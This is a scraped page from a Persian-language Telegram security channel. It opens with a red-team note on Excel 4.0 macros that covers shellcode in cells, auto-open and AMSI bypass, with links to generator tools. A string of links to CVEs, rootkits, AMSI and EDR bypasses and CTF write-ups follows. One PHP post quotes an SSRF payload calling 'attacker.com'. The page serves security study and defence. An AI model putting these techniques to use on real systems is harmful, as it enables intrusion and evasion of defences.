NEW BOT Телеграм, страница

Security Analysis

⭕️Red Team Note

یکی از تکنیک های مورد استفاده در initial access و یا حتی در lateral movement استفاده از ماکرو ها می باشد.
تکنیک مورد بحث در این پست

xlm macro

میباشد که با این تکنیک شما در قسمت فرمول اکسل به جای فرمول
شل کد تزریق میکنید و ادامه ماجرا..
نکته ای که میتونه مهم کنه این تکنیک رو استفاده نشدن از vba است که قالبا در ماکرو ها ازش استفاده میشه و استفاده اش از ساختار com و win api ها قابلیت دور زدن amsi رو پیدا میکنه که میتونه خیلی برای ما اهمیت داشته باشه.
برای اجرای این تکنیک insert داخل sheet استفاده میکنیم

ms excel 4.0 macro

رو انتخاب میکنیم
از اینجا دیگه میتونیم دستوراتمون رو در هر سلول بنویسیم و البته auto open هم فعال کنیم.
خب حالا از چه روش هایی برای دسترسی میتونیم استفاده کنیم؟
اول اینکه میتونیم دستور cmd اجرا کنیم و بحث nc و امثالهم
دوم اینکه میتونیم با ابزار هایی مثل

https://github.com/mdsecactivebreach/SharpShooter

https://github.com/Synzack/Excel-4.0-Shellcode-Generator

https://github.com/outflanknl/Excel4-DCOM

شل کدی رو ایجاد کنیم
سوم اینکه میتونیم از تکنیک های cobalt strike استفاده کنیم
و در اخر بیایم کمی عمیق شیم در دستوراتش

register()

توابع win api رو فراخوانی میکنه

halt()

اجرای ماکرو رو متوقف میکنه

exec()

یه فایلی رو اجرا میکنه حالا یا اجرایی یا فایل دیگه ای
و..

https://d13ot9o61jdzpp.cloudfront.net/files/Excel%204.0%20Macro%20Functions%20Reference.pdf

که اینجا تمامی توابع هستش.

حالا چجوری استفاده کنیم از این موارد؟
خب در ابتدا با

register

win api هارو
فراخوانی میکنیم
و سورس پیلودمون رو بر مبنی

.net assembly

کامپایل میکنیم و بعد به شل کد تبدیل میکنیم.
این قسمت null byte های شل کدمون رو حذف میکنیم
و شل کدمون رو تبدیل به ascii میکنیم که در تابع char() قرار میگیره
که با فراخوانی توابع ویندوزی در ابتدا ما شل کدمون رو داخل قسمتی از مموری که ذخیره کرده ایم اجرا میکنیم
ناگفته نمونه

https://github.com/FortyNorthSecurity/EXCELntDonut

این ابزار هم خیلی خوبه که ابزار نوشته شده موسسه ای هست که eyewitness رو نوشتن.
خب بریم سر وقت اینکه چیکارش کنیم؟
چطور جلوگیری بشه ؟
در ابتدا ابزاری برای رفع مبهم سازی ماکرو های این مدل دیدم که به نظر چیز بدرد بخوری میومد

https://github.com/DissectMalware/XLMMacroDeobfuscator

برای جلوگیری ازش هم خب در ورژن های جدید آفیس غیر فعال است
اما باز پالیسی هایی در admx و یا رجیستری هست

https://4sysops.com/archives/restricting-or-blocking-office-2016-2019-macros-with-group-policy/
https://blog.malwarebytes.com/reports/2022/01/microsoft-is-now-disabling-excel-4-0-macros-by-default/

#redteam #amsi #macro #winapi
@securation

🔥8👍5👎3

3.81K viewsAdel, edited 16:34

Security Analysis

https://infosecwriteups.com/zero-day-vulnerability-chromium-v8-js-engine-issue-1303458-use-after-free-in-x64-instruction-e874419436a6

Medium

Zero Day Vulnerability: Chromium v8 js engine issue 1303458 — Use After Free in x64 Instruction…

Introduction

👍5👎2

2.31K viewsAdel, 17:47

Security Analysis

https://c3rb3ru5d3d53c.github.io/documents/malware-analysis-reversing-workflow/

👎3

2.32K viewsAdel, 07:04

Security Analysis

http://noahblog.360.cn/apache-httpd-ajp-request-smuggling/

root@cyberworld:~# Noah Lab

CVE-2022-26377: Apache HTTPd AJP Request Smuggling

本文介绍了一种针对 AJP 的全新攻击方法和思路，打开在诸如 Apache HTTPd 使用 proxy_ajp 对 Tomcat AJP 进行反向代理、产品自研的 AJP 反向代理的攻击面，同时也可以尝试横向扩展至 FastCGI 等协议（当然，并没有挖到其他协议的）。本文的灵感来源是针对 ████████████ 进行审计的过程中，发现其实现了一个名为 Secure Gateway 的网关，此网关针对连接进入的 HTTP 协议解析后转化为 AJP 协议数据包后，转发到后端的 Tomcat AJP…

👍7👎2

2.31K viewsAdel, 15:26

Security Analysis

https://twitter.com/1rpwn/status/1545689030930878464

X (formerly Twitter)

Adel (@1rpwn) on X

A Linux eBPF rootkit with a backdoor, C2, library injection, execution hijacking, persistence and stealth capabilities.
https://t.co/BYOJgT0eIk
#linux #kernel #eBPF #backdoor #c2

👍9👎3

2.37K viewsAdel, 08:45

Security Analysis

https://securityonline.info/cve-2022-32212-node-js-arbitrary-code-execution-vulnerability/

Daily CyberSecurity

CVE-2022-32212: Node.js arbitrary code execution vulnerability

Node.js released an advisory to fix seven vulnerabilities including 3 separate HTTP Request Smuggling, one code execution (CVE-2022-32212)

👍2👎2

2.31K viewsAdel, 11:58

Security Analysis

#SSRF
@securation

👍10👎2🔥1

2.49K viewsAdel, edited 17:48

Security Analysis

https://youtu.be/CTYyadO2IuQ

YouTube

spring data mongodb remote code execution | cve-2022-22980 poc

#spring Data #mongodb SpEL injection vulnerability : CVE-2022-22980
A Spring Data MongoDB application is vulnerable to #SpEL #injection when using @Query or @Aggregation-annotated query methods with SpEL expressions that contain query parameter placeholders…

👍4👎2

2.44K viewsAdel, 11:48

Security Analysis

https://blog.huli.tw/2022/07/11/en/googlectf-2022-horkos-writeup/

Huli's blog

Insecure Deserialization in JavaScript: GoogleCTF 2022 Web/HORKOS Writeup

We all heard about insecure deserialization vulnerability and saw many real-world cases in Java, PHP, and other languages. But, we rarely hear about this vulnerability in JavaScript. I think it’s be

👍2👎2

2.78K viewsAdel, 12:13

Security Analysis

⭕️ Obfuscating Memory Regions with Timers

https://mez0.cc/posts/vulpes-obfuscating-memory-regions/
#redteam #memory #obfuscation #edr #av #bypass
@securation

👍3

2.9K viewsAdel, 06:11

Security Analysis

AS-22-Korkos-AMSI-and-Bypass.pdf

1.3 MB

⭕️ Two new AMSI bypass PoC's via Provider Patching into my Amsi-Bypass-Powershell repo. Plus one PoC in Nim as pull request for OffensiveNim:

https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell#with-add-type
#amsi #bypass #powershell
@securation

🔥6👎2

2.51K viewsAdel, 19:05

Security Analysis

https://o5wald.github.io/posts/binary_exploitation_basics/

o5wald.github.io

Basics for Binary Exploitation

we all know how C programs is get compiled.
first your C file goes to the compiler, then compiler convert it into sequence of operation that will be executed by computer each operation compiled into sequence of bytes called operation code or OP code Why Assembly…

👍4👎1🔥1

2.26K viewsAdel, 21:41

Security Analysis

https://dazzyddos.github.io/posts/Remote-Process-Enumeration-with-WTS-Set-Of-APIs/

Dazzy Ddos

Remote Process Enumeration with WTS Set of Windows APIs

Introduction

👍4👎1

2.15K viewsAdel, 06:25

Security Analysis

⭕️ اگه توی حوزه کشف و تحلیل آسیب پذیری های باینری فعالیت دارید پس باید درمورد semgrep هم بدونید که ابزار خیلی خوبیه :)
زبان های مختلفی رو پشتیبانی میکنه و رول های مختلفی برای آسیب پذیری هایی
مثل :‌
buffer overflows
integer overflows
format strings
command injection
race conditions
miscellaneous
و..
داره که میتونیم استفاده کنیم
این ابزار رو میتونیم بصورت افزونه روی ghidra یا vscode داشته باشیم و زمان Disassemble کردن طبق رول های مربوطه کد هارو بررسی میکنه.
نکته دیگه که میتونه مفید باشه میتونیم rule مورد نظر خودمون رو داشته باشیم و با ساختاری که خودمون ایجاد کردیم شروع به بررسی بکنه.
https://github.com/0xdea/semgrep-rules

و این لینک هم روشی برای کشف اسیب پذیری بصورت خودکار با ترکیب ghidra و این ابزار

https://security.humanativaspa.it/automating-binary-vulnerability-discovery-with-ghidra-and-semgrep/
#0day #vulnerability #ghidra #reverse
@securation

GitHub

GitHub - 0xdea/semgrep-rules: A collection of my Semgrep rules to facilitate vulnerability research.

A collection of my Semgrep rules to facilitate vulnerability research. - 0xdea/semgrep-rules

👍12🎉2👎1

2.65K viewsAdel, 17:53

Security Analysis

https://www.youtube.com/watch?v=gfZRaftYKrk

YouTube

php 8.1 remote code execution

In this video we are going to solve one of the vulnmachines lab zero is cool.
PHP verion 8.1.0 backdoor was released with a backdoor on March 28th 2021, but the #backdoor was quickly discovered and removed. If this version of #php runs on a server, an #attackers…

👍6👎1

2.09K viewsAdel, 09:42

Security Analysis

https://decoded.avast.io/davidalvarez/linux-threat-hunting-syslogk-a-kernel-rootkit-found-under-development-in-the-wild/

Gendigital

Linux Threat Hunting: ‘Syslogk’ a kernel rootkit found under development in the wild

Syslogk Rootkit Revealed: Analysis

👎1

2.19K viewsAdel, 09:36

Security Analysis

Defeating Javanoscript Obfuscation

https://www.perimeterx.com/tech-blog/2022/defeating-javanoscript-obfuscation/

HUMAN Security

Blog | HUMAN Security

Check out the latest HUMAN Blogs for expert insights and industry expertise on digital threats.

👍1👎1

2.36K viewsAdel, 09:50

Security Analysis

https://www.microsoft.com/security/blog/2022/07/14/north-korean-threat-actor-targets-small-and-midsize-businesses-with-h0lygh0st-ransomware/

Microsoft News

North Korean threat actor targets small and midsize businesses with H0lyGh0st ransomware

A group of actors originating from North Korea that MSTIC tracks as DEV-0530 has been developing and using ransomware in attacks since June 2021. This group, which calls itself H0lyGh0st, utilizes a ransomware payload with the same name.

👎1

2.33K viewsAdel, 21:30

Security Analysis

Chrome zero-day exploit used to target journalists in the Middle East. Israel 🇮🇱

https://www.androidpolice.com/chrome-zero-day-exploit-middle-east-journalists/

Android Police

Chrome zero-day exploit used to target journalists in the Middle East

Google patched this security hole, but it's still an active risk

👍6👎1

2.47K viewsAdel, 04:29

Security Analysis

https://hencohen10.medium.com/microsoft-dynamics-container-sandbox-rce-via-unauthenticated-docker-remote-api-20-000-bounty-7f726340a93b

Medium

Microsoft Dynamics Container Sandbox RCE via Unauthenticated Docker Remote API 20,000$ Bounty

On 17.11.2021 I reported a critical security issue in Microsoft Dynamics Container Sandbox, that allows Microsoft Customers to setup a…

👍2👎1

2.5K viewsAdel, 05:50

Security Analysis

⭕️ Exploiting Arbitrary Object Instantiations in PHP without Custom Classes

PHP’s Arbitrary Object Instantiation:
این مورد یک آسیب پذیری هست که به حمله کننده اجازه ساختن object های دلخواهش رو در PHP میده.
کد آسیب پذیر در مقاله به طور خلاصه به صورت زیر هست

new $_GET['a']($_GET['b']);

حمله کننده اپلیکیشن آسیب پذیر رو در یک پروسه تست نفوذ داخلی پیدا میکنه. ابتدا در یک پروسه تست نفوذ داخلی یک سرویس LDAP پیدا میکنه که دسترسی بهش از طریق anonymous user امکان پذیر نبوده. بعدش با ست کردن کانفیگ زیر در فایل etc/hosts/ اش قادر به دور زدن پروسه احرازهویت میشه به دلیل اینکه سرویس LDAP با چک کردن TLS SNI احراز هویت رو انجام میداده

10.0.0.1 company.com

سپس حمله کننده اپلیکیشن PHP ای پیدا میکنه که از LAM یا LDAP Account Manager استفاده میکرده و سپس اقدام به خوندن سورس کد میکنه.
تعدادی از فایل های اپلیکیشن امکان دسترسی برای کاربران بدون احراز هویت رو داشتن که در یکی از این فایل ها ، محقق متوجه میشه که ۲ پارامتر به نام های module و HelpNumber از کاربر گرفته میشن که در نهایت به صورت زیر instantiate میشن

new $_GET['module']($_GET['HelpNumber']);

و اقدام به اکسپلویت کردن این آسیب پذیری به روش های مختلف میکنه:‌
1. Exploiting SSRF + Phar deserialization
2. Exploiting through PDOs
3. Exploiting through the Imagick Extension
برای مثال در اکسپلویت SSRF + Phar deserialization محقق به ترکیب زیر میرسه

new SplFileObject('http://attacker.com/');

از طریق کلاس SplFileObject امکان برقراری ارتباط به هر هاست لوکال یا ریموت وجود داره. که این امکان SSRF رو به ما میده و ذکر میکنه که در PHP ورژن های 8 به پایین امکان تبدیل کردن این SSRF به deserializations از طریق Phar protocol وجود داره.
لینک کامل این مقاله:
https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/
#PHP #Web
@securation

GitHub

GitHub - LDAPAccountManager/lam: LDAP Account Manager

LDAP Account Manager. Contribute to LDAPAccountManager/lam development by creating an account on GitHub.

👍10👎2

4.02K views12:35

About

Blog

Apps

Platform